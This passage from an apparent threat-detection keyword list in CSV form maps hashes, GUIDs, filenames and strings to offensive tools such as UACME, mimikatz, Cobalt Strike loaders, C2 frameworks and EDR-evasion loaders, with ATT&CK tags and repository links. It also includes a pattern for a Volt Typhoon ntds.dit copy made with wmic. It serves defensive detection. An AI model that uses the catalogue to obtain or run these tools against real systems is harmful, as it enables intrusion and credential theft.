
+"*928097a924168caad66fead2633e4d44e4f585e0d33d05deb50b9c2d34cda246*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z"
+"*9434096968402430d1ace03ffbb13ba28c2e4fcb23e59ed353eac70aa02b5b25*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*946D24E4-201B-4D51-AF9A-3190266E0E1B*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z"
+"*969b35213fa23ff50a169e5498a97f28bc6f5820b447b78ec9dc6910dd8cc3e8*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*97e0720ed22d2d99e8148aab7ab2cb2cc3df278225669828b2d8d4d9ef856d94*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*9877129f209f0c3faf146ab725442b614c49942b7b888e3aabf5903217cb0503*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*99$1a7F1qr2HihoXfs/56u5XMdpDZ83N6hW/HI=*","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","36","4","2023-02-02T10:40:59Z","2023-01-27T07:52:47Z"
+"*99e3e313b62bb8b55e2637fc14a78adb6f33632a3c722486416252e2630cfdf6*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
+"*99E40E7F-00A4-4FB1-9441-B05A56C47C08*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","0","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z"
+"*9a4b0023e443b33d85280eedb510864c42b4146c8e6e5f742444b3eff0aae55f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*9AA32BBF-90F3-4CE6-B210-CBCDB85052B0*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*9AC25A8825407CCB6089BC7A2DF530D1830795B7E71A981ECEE4C5F48387B37A*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" +"*9b9850751be2515c8231e5189015bbe6:49ef7638d69a01f26d96ed673bf50c45*","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","0","N/A","10","10","490","125","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" +"*9b9dad8b40daf87f796c91a0538198921acebd13d47515e0e27b18eaad6906f4*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*9bd3b7a206ced26ce5e03a4002bbd41e4f57b8c8c9ce4467f54221ad68e55a58*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation 
tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*9c0087f31cd45fe4bfa0ca79b51df2c69d67c44f2fbb2223d7cf9ab8d971c360*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*9c71ab720c5589739b70ecd7f5bae0bb6ab2ac043bac1a24aec50864f3037719*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*9cbedf9b92abaef3ea28de28dd523ac44079592178ef727c7003c339a5a54712*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*9ccf0c8c7eef918c9dd7b89dd94f0dfa7dc8779b1f9e862908b09b47b75f7d1f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*9D1B853E-58F1-4BA5-AEFC-5C221CA30E48*","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - 
TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1151","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" +"*9D365106-D7B8-4B5E-82CC-6D6ABCDCA2B8*","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","0","N/A","9","3","278","42","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" +"*9E357027-8AA6-4376-8146-F5AF610E14BB*","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","0","N/A","8","10","110","13","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" +"*9e3f1386bfb64dbaa3cbb12fd3bf51c734872c2fdf15cf1aaeca52a515767519*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*9emin1/charlotte*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" +"*A La Vie* A L'Amour*","offensive_tool_keyword","mimikatz","mimikatz default strings","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - 
T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*a0rtega/metame*","offensive_tool_keyword","metame","metame is a metamorphic code engine for arbitrary executables","T1027 - T1059.003 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/a0rtega/metame","1","1","N/A","N/A","6","508","96","2019-10-06T18:24:14Z","2016-08-07T13:56:57Z" +"*A17656B2-42D1-42CD-B76D-9B60F637BCB5*","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","0","N/A","7","3","267","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" +"*A38C04C7-B172-4897-8471-E3478903035E*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*A38C04C7-B172-4897-8471-E3478903035E*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*a3bc28e48c61afe31a0c986674ac145e773d616b2fafb49a090d50cc26ea4479*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation 
tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*A3h1nt/gimmeSH*","offensive_tool_keyword","gimmeSH","gimmeSH. is a tool that generates a custom cheatsheet for Reverse Shell. File Transfer and Msfvenom within your terminal. you just need to provide the platform. your Internet protocol address and your port number.","T1059 T1505","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/A3h1nt/gimmeSH","1","1","N/A","N/A","2","168","27","2021-08-27T03:12:15Z","2021-08-02T07:22:15Z" +"*a6730ebb3e91961283f7a1cd95ace2a6d0d55e50531a64e57b03e61a8cf2d0e7*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*a7469955bff5e489d2270d9b389064e1*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*a78983b009b688a82458abac952516db57dc7eb3118a35cc737dde29c7b87ec4*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - 
TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*A7AD39B5-9BA1-48A9-B928-CA25FDD8F31F*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","0","N/A","10","1","47","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" +"*A8FE1F5C-6B2A-4417-907F-4F6EDE9C15A3*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" +"*aa3939fc357723135870d5036b12a67097b03309*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.exe*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*AAABAAMAEBAAAAEAIABoBAAANgAAACAgAAABACAAKBEAAJ4EAAAwMAAAAQAgAGgmAADGFQAAKAAAABAAAAAgAAAAAQAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP39*","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","10","2","152","10","2023-09-06T12:25:08Z","2023-08-02T14:30:41Z" +"*AAB4D641-C310-4572-A9C2-6D12593AB28E*","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","0","N/A","10","3","241","40","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" +"*aakchaleigkohafkfjfjbblobjifikek*","greyware_tool_keyword","ProxFlow","External VPN usage within coporate network","T1090.003 - 
T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*AAP-AddToHighPrivilegePrincipalMap*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" +"*AAP-CheckIfMemberOfPrivilegedDirectoryRole*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" +"*AAP-DisplayApplicableMFAConditionalAccessPolicyForUserID*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" +"*AAP-DisplayHighPrivilegePrincipalMap*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" 
+"*AAP-DisplayNonHighPrivilegedRoleAssignments*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" +"*AAP-GetHighPrivilegedDirectoryRoleTemplateMap*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" +"*abopscript.txt*","offensive_tool_keyword","EQGR","Equation Group scripts and tools","T1213.001 - T1203.001","TA0001 - TA0003","N/A","N/A","Exploitation tools","https://fdik.org/EQGRP/Linux/doc/old/etc/abopscript.txt","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*aboul3la*","offensive_tool_keyword","Github Username","Github username of pentester known for enumeration tools","N/A","N/A","N/A","N/A","Information Gathering","https://github.com/aboul3la","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*AbuseGithubAPI*.cpp*","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","10","10","115","29","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" +"*AbuseGithubAPI*.exe*","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","10","10","115","29","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" +"*ac i ntds*\\127.0.0.1\ADMIN$\*","greyware_tool_keyword","wmic","The actor has executed WMIC commands [T1047] to create a copy of the ntds.dit file and SYSTEM 
registry hive using ntdsutil.exe","T1047 - T1005 - T1567.001","TA0002 - TA0003 - TA0007","N/A","Volt Typhoon","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*ACBypassTest*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-FodHelperBypass.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Accenture/Spartacus*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking 
Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","1","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" +"*AccessTokenImpersonationAccount*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Accounts with extra permissions.txt*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"*AceLdr.*.bin*","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","714","123","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" +"*AceLdr.zip*","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","714","123","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" +"*acf7a8a9-3aaf-46c2-8aa8-2d12d7681baf*","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for lateral movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","0","N/A","10","6","567","85","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" 
+"*acheron-master.zip*","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","244","31","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" +"*ACLight.ps1*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","1","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"*ACLight.psd1*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","1","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"*ACLight.psm1*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","1","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"*ACLight2.ps1*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","1","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"*ACLight2.psd1*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","1","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" 
